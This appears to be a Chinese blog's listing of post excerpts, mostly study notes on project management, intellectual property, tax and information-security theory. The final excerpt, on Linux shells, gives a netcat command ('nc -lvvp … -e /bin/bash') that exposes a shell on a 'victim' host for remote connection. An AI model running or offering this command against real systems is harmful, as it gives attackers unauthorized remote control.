- 博客(129)
- 收藏
- 关注
RSS订阅原创 知识产权管理
与著作相关,类似权利,通常指表演者,录音制作者,广播电视组织在传播作品的活动方面因劳务和投资而享有的权力,即作品传播者的权利。广义---著作权,领接权,专利权,商标权及商业秘密权,防止不正当竞争权,植物新品种权,集成电路布图设计圈、地理标志权。文字作品,口述作品,美术建筑作品,摄影作品,设计图,图形作品和模型作品,艺术作品,常见的一些法规:合同法,招投标法,著作权法,政府采购法。狭义---著作权,领接权,专利权,商标权。委托开发的,A委托B,没约定注册权属于B。特征:无体性,专有性,地域性,时间性。
2024-01-23 13:25:47
399
原创 项目验收总结
行政收尾,检查成员和干系人是否按规定履行了所有职责总结会准备:全面项目人员共同进行,列出执行过程中若干优点和缺点,讨论重点呈现总结会内容:项目绩效,技术绩效,成本绩效,进度计划绩效,项目的沟通,识别问题和解决问题,意见和建议。
2024-01-23 13:08:26
434
原创 信息系统安全管理
保密性--最小授权原则,防暴露,信息加密,物理保密,网络安全协议,身份认证服务,数据加密完整性---协议,纠错编码,密码校验,数字签名,公证,CA认证,防火墙系统,入侵检测系统可用性---数据冗余及备份,磁盘和系统的容错,安全进程和机制不可抵赖性。
2024-01-22 21:55:41
993
原创 项目风险管理
风险分类:分类性质:纯粹风险,投机风险---对应火灾,股票买卖产生原因:自然,社会,政治,经济,技术风险性质:客观性,偶然性,相对性,社会性,不确定性风险过程:5计划1监控5计划:规划风险,识别风险,实施定性风险分析,实施定量风险分析,规划风险应对,1监控:控制风险风险因素:风险偏好,风险承受力,风险临界值。
2024-01-22 21:11:17
360
原创 项目变更管理
使实际执行情况和项目基准相一致的管理。变更性质:重大变更,重要变更,一般变更。由不同审批权限控制。变更迫切性:紧急变更,非紧急变更发生领域:进度,成本,质量,设计,实施,工作范围都会变更变更原因:过失或疏忽,新需求,应对风险,执行和基准不一致,人员调整,技术革新,外部事件。
2024-01-21 21:58:56
312
原创 文档和配置管理
开发文档----开发过程本身。可行性研究报告和项目,需求规格,功能规格说明,设计规格说明,包括程序和数据规格说明,开发,软件集成和测试计划,质量保证计划,安全和测试信息。产品文档----开发过程的产物。培训,参考手册,用户指南,软件支持手册,产品手册和信息广告。管理文档----项目管理信息。进度和进度记录,变更情况,职责定义。1级---最低限度文档---开发自用,工作量低于1个人2级---内部文档3级---工作文档---同已单位内若干人联合开发4级---正式文档---正式发行供普遍使用的软件产品。
2024-01-20 16:17:02
793
原创 项目合同管理
总承包合同----大承包商单向项目承包合同----吸引承包人竞争分包合同----总承建的把某一部分分包给其他人。分包限制资质条件,且需发包人同意,知只能将非关键,非主体部分进行分布,不可二次分包。
2024-01-18 18:55:25
349
原创 项目沟通管理和干系人管理
沟通渠道:M=n*(n-1)/2,n是人数大于等于1沟通噪音:外部,内部,语义噪音沟通方式3类:参与讨论方式,征询方式,推销方式,叙述方式-----控制程度由弱到强实际表现为头脑风暴,调查问卷,叙述结束,劝说鼓动沟通渠道2类:文字,语音----文字没有控制力不利于情感传递。语言没有文字精确。
2024-01-17 19:39:42
384
原创 小知识注册资本变化
为什么是严格的法定资本,因为要求设立企业时,执照上写100万就必须有100万钱在银行账户,验资之后才能成立公司。而且还不能抽逃出资。增减变动有严格程序。可以。属于事前防范,是公司信用的体现。对不同类型公司还有出资最低限制。股份有限公司1000万,有限公司10,30,50万分行业(生产经营50,商品批发50,商品零售30,科技开发咨询服务性公司10)无形资产不得超过有限责任公司注册资本的20%。
2024-01-16 23:46:40
1388
原创 TAX个税小知识
人:个人,非居民个人种类:工资薪金,劳务报酬所得,特许使用费,稿酬所得工资按月支付扣税,不用个人提供发票,有签劳动合同;其他三项按月或按次扣税,需要开发票。
2024-01-15 17:33:15
363
原创 项目质量管理
3过程:计划,执行,监控项目管理是在时间,范围,成本和质量都达到项目干系人的期望。质量关系到干系人的满意度。质量指挥和控制活动:质量方针,质量目标;质量规划,质量保证,质量控制,质量改进。管理阶段:手工艺人时代质量检验阶段----计划职能和执行职能相分离统计质量控制阶段----美-休哈特提出控制和预防缺陷,统计过程控制理论;道奇和罗明提出统计抽样检验;戴明提出生产和经营系统的问题,强调最高管理层对质量管理的责任。全面质量管理阶段----美费根和朱兰提出全面质量管理理论TQM;
2024-01-14 20:39:48
417
原创 项目进度管理
将工作包分解为活动,对项目工作进行估算,进度规划,执行,监督和控制的基础一个工作包有一个或多个活动里程碑清单---里程碑是一个时间点,持续时间为0,不消耗资源也不花费成本。
2024-01-13 16:21:30
394
原创 项目整体管理
是一项综合性和全局性的管理工作有6大过程:制定项目章程,制定项目管理计划指导和管理项目工作,监控项目工作,实施整体变更控制,结束项目或阶段项目整体管理是项目管理的核心,各要素间相互协调,矛盾,目标中寻找最佳平衡点。
2024-01-10 20:01:07
380
原创 TAX税类小知识
我国作为流转税为主国家,目前经历3类税制:统收统付--包干制---分税制,分别对应时间为建国--改革开放--93年朱提出分税延续至今;未来趋势必然是完善所得税。ps:流转税是间接税,间接转嫁给消费者;直接税是直接面向个人征收,美国是直接税。
2024-01-09 13:30:54
367
原创 信息安全监管
中央办公厅2003的27号文件《国家信息化领导小组关于加强信息安全保障工作的意见》方针:积极防御,综合防范目标、要求:全面提高信息安全防护能力,保护公众利益,维护国家安全。
2024-01-08 18:11:19
889
原创 计算机环境安全
windows---主体:账户,计算机,服务安全标识符SID-Security Identifier普通用户SID是1000,管理用SID是500linux---主体:用户,用户组,服务用户标识符UID,用户组标识符GID。
2024-01-06 20:05:54
1265
原创 信息安全技术
历史:古典的数据安全---近代的机械密码--现代的密钥保密算法不保密--公钥的密钥分发和管理科克霍夫Kerckhoff原则:算法公开,密钥保密。
2024-01-03 23:48:10
934
原创 安全工程和运营
广义的是系统生命周期上集成的动态过程,狭义的是规划设计实施网络安全防护措施的过程。解决系统生命周期过程安全问题:与信息化同步规划、建设、使用安全工程四个方面:动机、机制、策略、保证。
2024-01-02 15:34:10
342
原创 信息安全评估
是针对潜在影响正常执行其职能的行为产色产生干扰或破坏的因素进行识别、评价的过程广义上是综合的包括测试、检测、测评、审核、评估检查等进行综合评价和预测;狭义的就是某个信息安全风险风评。
2024-01-02 12:46:19
647
原创 业务连续性管理
业务连续性BC---business continuity业务连续性管理BCM---找出潜在威胁对业务运行影响,有效保护措施,提供恢复能力的整体管理过程业务驱动,业务部们主导,IT和网络安全参与核心:考虑业务中断影响BCM负责人:业务相关负责人 分析关键资产,这些关键资产的威胁和出现威胁对业务的影响 业务目标,范围,内容,边界,流程,关系 判断优先级:经济产值,核心技术,公共服务能力 资产分析,威胁分析,脆弱性分析,安全措施分析 影响程度高低
2023-12-30 13:54:50
382
原创 信息安全事件应急响应
准备---预防为主检测---主动检测确认发生事件的严重性、性质和影响---4级中哪级7类中哪类--责任人--影响范围遏制---防止范围扩大损失上升---平衡时间空间---断网,封锁根除---根源解决,标本兼治,避免在发生恢复---恢复系统,业务,消除部分影响跟踪总结---总结经验教训,标志应急响应报告,进入司法程序调查。
2023-12-30 13:33:31
372
原创 信息安全管理测量
安全检查-----特点环境任务,系统或设备的点对点检查,确定是否符合安全标准或规范。没有安全评估全面,也不安全评估里的包括政策、流程、控制措施。的安全评估方法,发现系统问题,验证系统抵抗攻击能力和安全控制措施的有效性。比渗透测试需要更多时间和人力。---发现系统漏洞,不能发现未知漏洞。密码的策略,防火墙设置更新。,证明系统位置漏洞和安全漏洞。内审+第三方审,比较详细。安全审计---安全合规流程,是。过程-对象-方法-执行-结果。的评估方法,安全合规流程,是。测量是衡量管理有效的。----发现系统中的。
2023-12-30 12:20:43
331
原创 信息安全管理实践
控制类型:预防、检测、纠正、威慑控制措施结构:14方面方针、组织、人力资源安全、资产管理、访问控制加密技术、物理和环境安全、操作安全、通信安全、系统的获取开发及维护供应商关系、信息安全事件管理、业务连续性管理中的信息安全、符合性。
2023-12-29 12:36:51
386
原创 信息安全风险管理指南GB/Z 24364
GB/Z 24364 信息安全风险管理指南小知识:GB是国标,是强制标准;GB/T是国家推荐标准,有法律约束性;GB/Z是国家指导标准,仅供使用者参考。
2023-12-29 11:34:10
385
原创 网络安全保障领域
云计算安全关键技术:可信访问控制、密文检索与处理、数据存在与可使用性、数据安全与隐私保护、虚拟化安全技术。存在风险:开源工具、优先访问权、管理权限、数据处、数据隔离、数据恢复、调查支持、长期发展风险。IaaS、PasS、SaaS(裸机,装好软件的电脑,装好应用的电脑)传输可以被物理破坏、信息篡改、信息泄露、攻击----北斗,还是卫星。感知层可以被物理破坏、欺骗、信息泄露----红外、声呐、测速。物联网技术架构4层:感知、传输、支撑、应用。隐私保护,招聘,通信记录,电话,行程,文档。支撑层有虚拟平台问题。
2023-12-25 21:17:48
515
原创 网络安全保障流程
满足法规合规、业务需求、风险评估信息系统保护轮廓ISPP-----标准化安全保障需求文档----从规范化、机构化需要包括:系统描述、安全环境、保障目的、安全保障要求、应用注解、符合性声明7部分。
2023-12-25 20:56:08
506
原创 网络安全法规和模型
ISO信息安全:为数据处理系统建立和采取,保护计算机硬件、软件、数据不因偶然的或恶意的原因而受到破坏、更改、泄露信息安全属性:CIA三元组:保密性、完整性、可用性其他属性:真实性、不可否认性、可问责性、可控制(比如数字签名就是抗抵赖的应用)分类:通信安全,信息系统安全,数据安全,信息安全,网络安全,信息技术安全,网络空间安全产生问题原因:内因:系统复杂产生漏洞外因:环境,人为安全特征:系统安全,动态安全,无边界安全,非传统安全。
2023-12-25 20:24:38
484
原创 linux反弹shell
下面是windows主机找到nc打开1.bat输入:nc 连接的IP地址 端口受害主机是nc -lvvp 端口 -t -e /bin/bashkali系统连接。
2023-11-27 11:43:05
578
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人